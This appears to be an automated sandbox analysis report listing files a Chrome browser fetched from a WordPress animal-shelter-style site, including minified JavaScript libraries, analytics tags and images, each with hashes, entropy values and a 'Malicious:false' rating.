                                                                                                                                                                                                                                                        URL:https://149955744.v2.pressablecdn.com/wp-includes/js/imagesloaded.min.js?ver=5.0.0
                                                                                                                                                                                                                                                        Preview:/*! This file is auto-generated */./*!. * imagesLoaded PACKAGED v5.0.0. * JavaScript is all like "You images are done yet or what?". * MIT License. */.!function(t,e){"object"==typeof module&&module.exports?module.exports=e():t.EvEmitter=e()}("undefined"!=typeof window?window:this,(function(){function t(){}let e=t.prototype;return e.on=function(t,e){if(!t||!e)return this;let i=this._events=this._events||{},s=i[t]=i[t]||[];return s.includes(e)||s.push(e),this},e.once=function(t,e){if(!t||!e)return this;this.on(t,e);let i=this._onceEvents=this._onceEvents||{};return(i[t]=i[t]||{})[e]=!0,this},e.off=function(t,e){let i=this._events&&this._events[t];if(!i||!i.length)return this;let s=i.indexOf(e);return-1!=s&&i.splice(s,1),this},e.emitEvent=function(t,e){let i=this._events&&this._events[t];if(!i||!i.length)return this;i=i.slice(0),e=e||[];let s=this._onceEvents&&this._onceEvents[t];for(let n of i){s&&s[n]&&(this.off(t,n),delete s[n]),n.apply(this,e)}return this},e.allOff=function(){return d
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:PNG image data, 900 x 629, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):431066
                                                                                                                                                                                                                                                        Entropy (8bit):7.9939176339662765
                                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                                        SSDEEP:6144:xkgihz+rzGhZgbr6ER8YDuwgdYCg5r7jBjCQfeWW/9Y5y5iU/rDXGrF3NdE+/ib7:7Ayv1LqKuuN5r7tjCyW/u5y5iUfYrDS7
                                                                                                                                                                                                                                                        MD5:ACDF20C26D08E55D484A7CC86345CE32
                                                                                                                                                                                                                                                        SHA1:F9295F1FA766BCCE64286F42BF22E4283EEE1F17
                                                                                                                                                                                                                                                        SHA-256:FEDBBB55AF371435D277264F6F59762986CD9CBAD24E323A2CE6ED4240CDCC32
                                                                                                                                                                                                                                                        SHA-512:CD0A835611D5431D462AC2470F3263EA79F6FC0AD97FC5ADBDC45F2CEC7F90D55338B49685742B404491DBEB99EAAE021EDCAB0BEF2BEFDD83417B5D1A7DA275
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:https://149955744.v2.pressablecdn.com/wp-content/uploads/2023/06/clinics.png
                                                                                                                                                                                                                                                        Preview:.PNG........IHDR.......u.......>3....gAMA......a....IiCCPsRGB IEC61966-2.1..H..SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m....... ......O.
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (3829), with no line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):3829
                                                                                                                                                                                                                                                        Entropy (8bit):5.148341057398745
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:48:kiVcqIyGggolrX2UQe0DzGbExQgpxJwOeOBuHgwLHACBhASVUF/IF/NUF/fF/fFD:Q+2wytZCvLzn9OYBMtEux
                                                                                                                                                                                                                                                        MD5:B7E42972220B534E2E32B38C3876572D
                                                                                                                                                                                                                                                        SHA1:76B4384936878AE8656F3DF843BEB7A3D88FD86B
                                                                                                                                                                                                                                                        SHA-256:DF2698E6CF74ED890AFA92DA10051F880DF2CE0B3257B73C5D9AE2F6BEA82D3C
                                                                                                                                                                                                                                                        SHA-512:FDE037E2E1B4FAF726016C70A89E07F268E46A457A5636813AA8D032CFF4528690BB9CF24A7A4EAE37134F65F632987BB5C94998DFFC0D06BDE181A8968B9B0F
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Preview:var _gauges=_gauges||[];(function(){var h=(_gauges['slice'])?_gauges.slice(0):[];_gauges={track_referrer:true,image:new Image(),track:function(){this.setCookie('_gauges_cookie',1,1);var a=this.url();if(a){this.image.src=a;var b=60*60,f=b*24,c=f*31,d=f*365,j=d*10;if(!this.getCookie('_gauges_unique_hour')){this.setCookie('_gauges_unique_hour',1,b)}if(!this.getCookie('_gauges_unique_day')){this.setCookie('_gauges_unique_day',1,f)}if(!this.getCookie('_gauges_unique_month')){this.setCookie('_gauges_unique_month',1,c)}if(!this.getCookie('_gauges_unique_year')){this.setCookie('_gauges_unique_year',1,d)}this.setCookie('_gauges_unique',1,d)}},push:function(a){var b=a.shift();if(b=='track'){_gauges.track()}},url:function(){var a,b,f,c=this.$('gauges-tracker');if(c){b=c.getAttribute('data-site-id');f=c.getAttribute('data-track-path');if(!f){f=c.src.replace('/track.js','/track.gif')}a=String(f);a+="?h[site_id]="+b;a+="&h[resource]="+this.resource();a+="&h[referrer]="+this.referrer();a+="&h[title]=
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=14, orientation=upper-left, resolutionunit=2, manufacturer=Apple, model=iPhone 15 Pro, xresolution=202, yresolution=210, software=17.6.1, datetime=2025:01:08 14:36:18, hostcomputer=iPhone 15 Pro, xresolution=259, yresolution=267, GPS-Data], baseline, precision 8, 420x705, components 3
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):104868
                                                                                                                                                                                                                                                        Entropy (8bit):7.942043914542796
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3072:33Bf8s/chQz1Yzjupq524bCgc3NLHOQ65hFrl0A97/nBZ:33BUuc2z+O1gc3NLCNuAt3
                                                                                                                                                                                                                                                        MD5:90CAEA003C93F848B5A83A75445E7D01
                                                                                                                                                                                                                                                        SHA1:7A0E27FD36220DB8826D3BF7542EF07C7D5630F4
                                                                                                                                                                                                                                                        SHA-256:F4182752172B1B5001429C281A46811F8821AC415210D39E52A4A8B88641F923
                                                                                                                                                                                                                                                        SHA-512:B551186F2161A638372465CC818244925DC43DB9C425CBF6694785E0F7680E09D402F1E9DEF5919AEA283917587E7943E69A3FA5206B6D48E698EC3FA4FB0593
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Preview:......JFIF.....H.H......Exif..II*...................(.......................................................................1...........2...........<...................................i...........%.......b.......Apple.iPhone 15 Pro.H.......H.......17.6.1.2025:01:08 14:36:18.iPhone 15 Pro.H.......H......."."...........'.......P...........0232............................................249.........249.........0100....................V...............................................................................................................2...........3...........4...0...........................$...........,...........@...........T...........\...........d...........l...........t...........|...|...............-05:00.-05:00.-05:00.................L...............Apple.iPhone 15 Pro back triple camera 6.765mm f/1.78.....o...L.......2025:01:08 14:36:18.2025:01:08 14:36:18..2..I.......'d..7k...(..........}...a...!.Y...\.Apple iOS...MM.5...............................h......................
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (23966)
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):24138
                                                                                                                                                                                                                                                        Entropy (8bit):5.096569708153791
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:384:Ar7mIr/Dh5rA3rzB4rMhr/XWGHW/6rMz1xftF2OUVP4eAnbhfreD6dCBEOav7blM:+SxxGG2/71xftFqVP4eAnI0ROavPSCzo
                                                                                                                                                                                                                                                        MD5:3B3FC826E58FC554108E4A651C9C7848
                                                                                                                                                                                                                                                        SHA1:76778FD446E2FF2377588A7B4AC4D79F258427C9
                                                                                                                                                                                                                                                        SHA-256:E00ADD38134EAC2FB8E8E9C09CBFFF7BBE57952B210322EB2EECB0A21FC055EB
                                                                                                                                                                                                                                                        SHA-512:AE192D8D804F7DAFD8B7A95220CEB66C0C308A51CDF42C172C20F71F50052E4529B01F8781C5F305E1E0D6C5367D9678F1D908EE4273DB594FBB650C56A9F61B
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:https://149955744.v2.pressablecdn.com/wp-includes/js/masonry.min.js?ver=4.2.2
                                                                                                                                                                                                                                                        Preview:/*! This file is auto-generated */./*!. * Masonry PACKAGED v4.2.2. * Cascading grid layout library. * https://masonry.desandro.com. * MIT License. * by David DeSandro. */..!function(t,e){"function"==typeof define&&define.amd?define("jquery-bridget/jquery-bridget",["jquery"],function(i){return e(t,i)}):"object"==typeof module&&module.exports?module.exports=e(t,require("jquery")):t.jQueryBridget=e(t,t.jQuery)}(window,function(t,e){"use strict";function i(i,r,a){function h(t,e,n){var o,r="$()."+i+'("'+e+'")';return t.each(function(t,h){var u=a.data(h,i);if(!u)return void s(i+" not initialized. Cannot call methods, i.e. "+r);var d=u[e];if(!d||"_"==e.charAt(0))return void s(r+" is not a valid method");var l=d.apply(u,n);o=void 0===o?l:o}),void 0!==o?o:t}function u(t,e){t.each(function(t,n){var o=a.data(n,i);o?(o.option(e),o._init()):(o=new r(n,e),a.data(n,i,o))})}a=a||e||t.jQuery,a&&(r.prototype.option||(r.prototype.option=function(t){a.isPlainObject(t)&&(this.options=a.extend(!0,this.optio
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 420x933, components 3
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):128812
                                                                                                                                                                                                                                                        Entropy (8bit):7.9803164211605155
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3072:hBTOjNlvUC0btEslZequtqjH34ScQhPTCFLc5geBNNqGTm:hUjNlneZlZelsX4AGezNw
                                                                                                                                                                                                                                                        MD5:43777C34086D41DEC67D023D75228A69
                                                                                                                                                                                                                                                        SHA1:C888C9FC2C0F5C4AAA6A8C4E07030B4DD8B40D89
                                                                                                                                                                                                                                                        SHA-256:44C6A41BDC39DEBE52E4D747DC203A5B52EA5DABAAC057373DC9649699853A77
                                                                                                                                                                                                                                                        SHA-512:FAD6FC6A7CE7CC4AC34BA7687EC102CBC230430E101831635DE003C75600A9B6B08817CECBE8B4487C9599643811D56E852C8716126122C9CCFB104F7BE2B1C8
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:https://g.petango.com/photos/352/46805e49-ef7b-4349-8a04-2f19534614d8.jpg
                                                                                                                                                                                                                                                        Preview:......JFIF.....`.`..................................................................................................................................................."........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....7...V.0........q7.#._.s^..W.K.6P.7..z..[....=..=ih.>.O.....3.h..+.RN.q........y.X... r@...I.=i...zW-.x. !.g...GS.d..]..u...l.q.@+.......'.p.fG.U...s+O.uMg...m. |......i>...0.O...I...I.!..I&..r....S.r.3R.(P.@..6.....61..h......d...1...IFb..3..^..Fp.V.c?....CR...Tu..+X.[...;...L.*...I........pyaE.X{..v......q....<...6.....%..@.4."+.......T.QW..f^.my.7..Q..j...\m9.=+.
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (3892), with no line terminators
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):3892
                                                                                                                                                                                                                                                        Entropy (8bit):4.948228779941934
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:96:fiZ9FFOMODOV7CIqs/QMGVy43icycNHWLf16xKtAHa:fiZnFPk+qs/QMGVjfycNHOd6xKtAHa
                                                                                                                                                                                                                                                        MD5:BDFB206242674030ADE64D5FD7713814
                                                                                                                                                                                                                                                        SHA1:9081528EAEC2C8BBE1F3F820F3257CA63E924C43
                                                                                                                                                                                                                                                        SHA-256:C08BEF0BF635A6EE6E573834A149A8E86EC3B93604980E928F028A5360E9485C
                                                                                                                                                                                                                                                        SHA-512:C77C1F4BEEAAB9A98DD9A2AA75B591634B75A7D105AE18296780C8595753F81BAD537B2AAE7B79B61FE93D93D7203850500AF52B5D7F2769885D386107C778C7
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:https://149955744.v2.pressablecdn.com/wp-content/plugins/thrive-visual-editor/editor/js/dist/modules/post-list.min.js?v=10.4.2&ver=10.4.2
                                                                                                                                                                                                                                                        Preview:void 0===TCB_Front.js_modules["post-list"]&&TCB_Front.setModuleLoadedStatus("post-list",!1),(t=>{if(!TCB_Front.isModuleLoaded("post-list")){t(window).on("tcb_after_dom_ready",(()=>{t(".tcb-post-list").each(((i,s)=>{new e(t(s)).renderPagination()}))}));class e{constructor(e){this.$element=e,this.content="",this.listArgs={};let i=this.getAttr("data-css");const s=t.Event("tcb_post_list_identifier.tcb");if(this.$element.trigger(s),s.identifier&&(i=s.identifier),this.identifier=i,this.listIdentifier="article",tve_frontend_options.is_editor_page?this.editorInit():this.frontendInit(),this.isCarousel()){this.isEditor=tve_frontend_options.is_editor_page;const t=this.$element.find(".tcb-carousel-container");t.attr("data-carousel-settings",decodeURI(t.attr("data-carousel-settings"))),this.carousel=new TCB_Front.Carousel(this),this.carousel.initCarousel()}}getPaginationInstance(){if(this.listArgs&&this.listArgs.attr){const t=this.listArgs.attr["pagination-type"];if(t.length&&"none"!==t&&void 0!==T
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=14, orientation=upper-left, resolutionunit=2, manufacturer=Apple, model=iPhone XR, xresolution=198, yresolution=206, software=18.1.1, datetime=2024:12:19 14:53:21, hostcomputer=iPhone XR, xresolution=251, yresolution=259, GPS-Data], baseline, precision 8, 315x420, components 3
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):37144
                                                                                                                                                                                                                                                        Entropy (8bit):7.858027232516446
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:768:EE3Q9Srm7apO/ailpfFrpP7RIPObo0WKtKp3vITbi2O6TsOMz:t3Q9/apAainftpP7e80fsbm6bMz
                                                                                                                                                                                                                                                        MD5:790A81BA371204AA3BAB1953F190D17D
                                                                                                                                                                                                                                                        SHA1:B73E69545CD5D2116250763798386B0F3BD24E6E
                                                                                                                                                                                                                                                        SHA-256:FB852F2FED904561413ACF0943A1D6E0F71A97083C705F14CC08C229B57FA339
                                                                                                                                                                                                                                                        SHA-512:680B07E96A9E479019C63E0C07B860111C21C2683D00B83F4DA4DB8F2951BF3F4B8E0CE190C74BE0994FCFF7DA62A372D4305F10ABBB8FD6391B0260B51751BC
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:https://g.petango.com/photos/352/0bc6f3ec-9651-4981-852c-606c251e94f3.jpg
                                                                                                                                                                                                                                                        Preview:......JFIF.....H.H......Exif..II*...................(.......................................................................1...........2...........<...................................i...........%...............Apple.iPhone XR.H.......H.......18.1.1.2024:12:19 14:53:21.iPhone XR.H.......H......."."...........'.......@...........0232............................................099.........099.........0100....................................................................................................................................2...........3...........4...#...................................................+...........?...........G...........O...........W..........._...........g...|...-...o.......-05:00.-05:00.-05:00.................................Apple.iPhone XR back camera 4.25mm f/1.8.....(...........2024:12:19 14:53:21.2024:12:19 14:53:21..m......'...E~..dp..I.........................2.Apple iOS...MM.*...............................h...........................................
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (5268)
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):273237
                                                                                                                                                                                                                                                        Entropy (8bit):5.5638182261002775
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3072:MIK2+EG+3Iw/JHzpprl0c4Q1A5yCOA7LcGB84x94cexKonhsG4WwwI:Xy+3IsJH1JSVUCTv4bKonhsGZU
                                                                                                                                                                                                                                                        MD5:EE738A85B68A234C93076D216FA9B56A
                                                                                                                                                                                                                                                        SHA1:0EE3A3E0A1952A1547D16AB18AF392552567B99A
                                                                                                                                                                                                                                                        SHA-256:4D98B8585921045D7529340F8E553DB9B71AE1758BBFF25962AAFF00558613A0
                                                                                                                                                                                                                                                        SHA-512:71DE8956EA143E197D2B19BAA9A5CA86907BA77783BB07ED76245B4CD3730D4B0C7D6E1121AEF75752E36BBC54A46275E5E54D584A1EC2F692038DE88D38F966
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:https://www.googletagmanager.com/gtag/destination?id=AW-1009911120&l=dataLayer&cx=c&gtm=45He5170v898710595za200
                                                                                                                                                                                                                                                        Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"1",. . "macros":[{"function":"__e"}],. "tags":[{"function":"__ogt_1p_data_v2","priority":3,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp_streetType":"CSS_SELECTOR","vtp_autoPhoneEnabled":true,"vtp_postalCodeType":"CSS_SELECTOR","vtp_emailValue":"","vtp_firstNameValue":"","vtp_streetValue":"","vtp_lastNameType":"CSS_SELECTOR","vtp_isEnabled":true,"vtp_autoAddressEnabled":true,"vtp_regionValue":"","vtp_countryValue":"","vtp_isAutoCollectPiiEnabledFlag":false,"tag_id":4},{"function":"__ccd
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (16664)
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):16665
                                                                                                                                                                                                                                                        Entropy (8bit):5.3013551207488465
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:GU1k0NwY44Xg68CU2dS8kcygRQOeukl0banlxyC0SXIHGGuGqY+AAUgdgKTGvcoZ:FkNx6VCFAG1GbjjD1AoYy6He/yq/9d
                                                                                                                                                                                                                                                        MD5:C22322B3D030360971584A98C60B6E0B
                                                                                                                                                                                                                                                        SHA1:A294CFD56F36A6C83A2A7B87BCC8B226BE977E50
                                                                                                                                                                                                                                                        SHA-256:3F6004A6C9021E04EC32CA88DF8F9A5785E53DA23511F1BF0D56DEFC1B9759F8
                                                                                                                                                                                                                                                        SHA-512:1C75119306313478B676A076B169F24B504C69BEC8529FBAAAE95298FF29D9CE69CD4B7F3461EE674335C4D776BD8294E9BCCEB03CCD9EDFB2618CD74C0C62FA
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:https://sb.scorecardresearch.com/beacon.js
                                                                                                                                                                                                                                                        Preview:var COMSCORE=function(n){var t=function(){return t=Object.assign||function(n){for(var t,e=1,r=arguments.length;e<r;e++)for(var i in t=arguments[e])Object.prototype.hasOwnProperty.call(t,i)&&(n[i]=t[i]);return n},t.apply(this,arguments)};"function"==typeof SuppressedError&&SuppressedError;var e=["co.uk","com.br","com.ar","com.tw","com.mx","co.jp","com.au","com.my","gob.mx","co.id","com.hk","mus.br","com.co","com.sg","com.tr","co.in","net.tw","com.pe","com.ve","co.es"];function r(n,t,e){-1==n.indexOf("?")&&(n+="?");var r=!1;(-1!=n.indexOf("&")||n.length-1>n.indexOf("?"))&&(r=!0);for(var i=0;i<t.length;++i){var o=t[i];for(var u in o)r&&(n+="&"),r=!0,n+=u+"="+c(o[u]+"")}return n=function(n,t){if(n.length>t){var e=n.substring(0,t-8).lastIndexOf("&");n=(n=n.substring(0,e)+"&ns_cut="+c(n.substring(e+1))).substring(0,t)}return n}(n,e),n}function i(n,t){for(var e in t){var r=t[e];r!=undefined&&(n[e]=r)}}var c="undefined"!=typeof encodeURIComponent?encodeURIComponent:escape,o="undefined"!=typeof
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (4161), with no line terminators
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):4161
                                                                                                                                                                                                                                                        Entropy (8bit):5.113318664604583
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:96:egbkJsYXW7DU2U6Gq7cDrLsbaO+RLTapcRbSmJAGzjpN2xmiejNcnRsJ7pX:egbCFXMDU2U60/LsbabLTaalAGzjpcxW
                                                                                                                                                                                                                                                        MD5:4976D90C77527CD79D54B58B049F68B5
                                                                                                                                                                                                                                                        SHA1:84A2C5A9113286FA7673D581848F39EF658E4C18
                                                                                                                                                                                                                                                        SHA-256:B63795D4538A869657B6F3BB5CB2A5298FD3A9303FC29AB4D054E5ED63404F07
                                                                                                                                                                                                                                                        SHA-512:53F9314CAD0EBE058B0412552C0442C08C21DA4E2660F231ACB56E50B7C05171ECAC670D833D051D01CB4C6112AF4FC2A52A919E764E87C0BB656C544291F041
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:https://149955744.v2.pressablecdn.com/wp-content/plugins/thrive-visual-editor/editor/js/dist/modules/carousel.min.js?v=10.4.2&ver=10.4.2
                                                                                                                                                                                                                                                        Preview:(()=>{var t={94185:t=>{void 0===TCB_Front.js_modules.carousel&&TCB_Front.setModuleLoadedStatus("carousel",!1),function(s,e){if(TCB_Front.isModuleLoaded("carousel"))return;const i={tablet:1023,mobile:767};class o{constructor(t){this.carousel=t,this.$carousel=t.$element,this.isEditor=t.isEditor,this.isEditor||this.bindFrontEvents()}static get elementsWithLinks(){return TCB_Front.Hooks.applyFilters("tve.carousel.element_with_links",".tcb-col[data-href],.thrv-content-box[data-href]")}static get carouselContainerSelector(){return".tcb-image-gallery-container, .tcb-carousel-container"}static get carouselSelector(){return'[data-type="carousel"]'}static getResponsiveSetting(t,s,e){const o=JSON.parse(JSON.stringify(t.responsive))["tablet"===e?0:1];let a;return a="desktop"!==e&&o&&o.breakpoint===i[e]&&void 0!==o.settings[s]?o.settings[s]:t[s],a}static setDots(t,s){const e=t.parents('.tcb-image-gallery,[data-type="carousel"]');s&&(t.length&&0===e.find(" > ul.tcb-carousel-dots").length&&e.append(t
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:GIF image data, version 89a, 200 x 197
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):4250
                                                                                                                                                                                                                                                        Entropy (8bit):7.72665586400111
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:96:i1fnVISmTZBTWgolQAFu4i5Ijv0iaR3TBs6UJ6HvAIKcR4DXk:UtISOfT7PUu4+KCR3a2LCDXk
                                                                                                                                                                                                                                                        MD5:6A30643CF57E42825EB01FB6719BFE62
                                                                                                                                                                                                                                                        SHA1:6A79F1B9A56E74CEEE8B0425AFE185872A74FB80
                                                                                                                                                                                                                                                        SHA-256:C8A889D414336ED9FE7D2E563161DBA0FDE3A0FDCED1949B3850F099DFF03514
                                                                                                                                                                                                                                                        SHA-512:2BDCC1208B7081870A74B2638C255FD7C2A9DF02BA34983A56AE415908E70784F09375864DEC985DE04A1959E61AC7C6E66B363183CA902E69109402132E3BEB
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Preview:GIF89a...................???..}.........///.........___.....OOO..............ooo...............ttq...mmk..........{{w..............................................550..................y........(($PPIxxmSSL..^^Ukkafff........................................................................................................................................................................!.......,............I...,3....................>(,.....0J..................1...I,.........J.+..+/....../(.I(.......+......,...........2.6.....I...HP..A,.*\.L....#.. h...[...#..J.%....EA$M.\.r.K.-_..s.Mw5o...V.JD..p.A.k...@$.h..3."........9U.U...G........]?^8ab.[e&.N..........E.....u!^..U.sK.V. ........x`c..J.<.....n.X...SW..Tbix....}.....^.K.......>G..q..Y..'....d......l..AU..z.....=..6.....P~9<......A:M.....O.~=..\....U..;..s.u..g.=...`..>.O..H0 ..V..9....... ~..G"!.L.@..ep"w... ...... .{.X.x..0A.H.`.......;&.dv.#.,.e...P6...P.........H..q...f.d*..;..cv.Z..4...#.]*c..
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (2310)
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):205072
                                                                                                                                                                                                                                                        Entropy (8bit):5.530205288786982
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3072:qTK2+EG+3Iw/xHzprs0bLQ1A5yCOA7LbpexKonhsGf8WH:my+3IsxHOSVMKonhsGj
                                                                                                                                                                                                                                                        MD5:E32D5CA726DB7C1C52B14EFED9C0A9FE
                                                                                                                                                                                                                                                        SHA1:96EA06EF8F804111D93F2949A8289BF7E265DFBD
                                                                                                                                                                                                                                                        SHA-256:D88A459F37BD4E60883B9DB33D9427A08CFA95BA429C51A5DF1BC75C9BFF5089
                                                                                                                                                                                                                                                        SHA-512:84D1E0AB967F349E3E563430ABD0E98AF4AFCFFBCCE5BC752CA6685A534929EA952EEC11FF1E5C707DF834BE701AB07FFD22E00B5BDF1FD5211AF04C686B4FFB
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:https://www.googletagmanager.com/gtm.js?id=GTM-NLDZQHP3
                                                                                                                                                                                                                                                        Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"2",. . "macros":[{"function":"__e"},{"function":"__u","vtp_component":"URL","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__u","vtp_component":"HOST","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__u","vtp_component":"PATH","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__f","vtp_component":"URL"},{"function":"__e"}],. "tags":[{"function":"__html","metadata":["map"],"once_per_event":true,"vtp_html":"\n\u003Cscript type=\"text\/gtmscript\"\u003E!function(b,e,f,g,a,c,d){b.fbq||(a=b.fbq=function(){a.callMethod?a.callMethod.apply(a,arguments):a.queue.push(arguments)},b._fbq||(b._fbq=a),a.push=a,a.loaded=!0,a.version=\"2.0\",a.queue=[],c=e.createElement(f),c.async=!0,c.src=g,d=e.getElementsByTagName(f)[0],d.parentNode.insertBefore(c,d))}(window,document,\"script
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):5236
                                                                                                                                                                                                                                                        Entropy (8bit):5.390254963423175
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:96:jYgEafJc+ufYgEaFNkYgpafJc+ufYgpaFNkOEadcJc+ufOEad5NkOXadcJc+ufOr:MO7VO9r7Vr7eDye8IeG9eHO
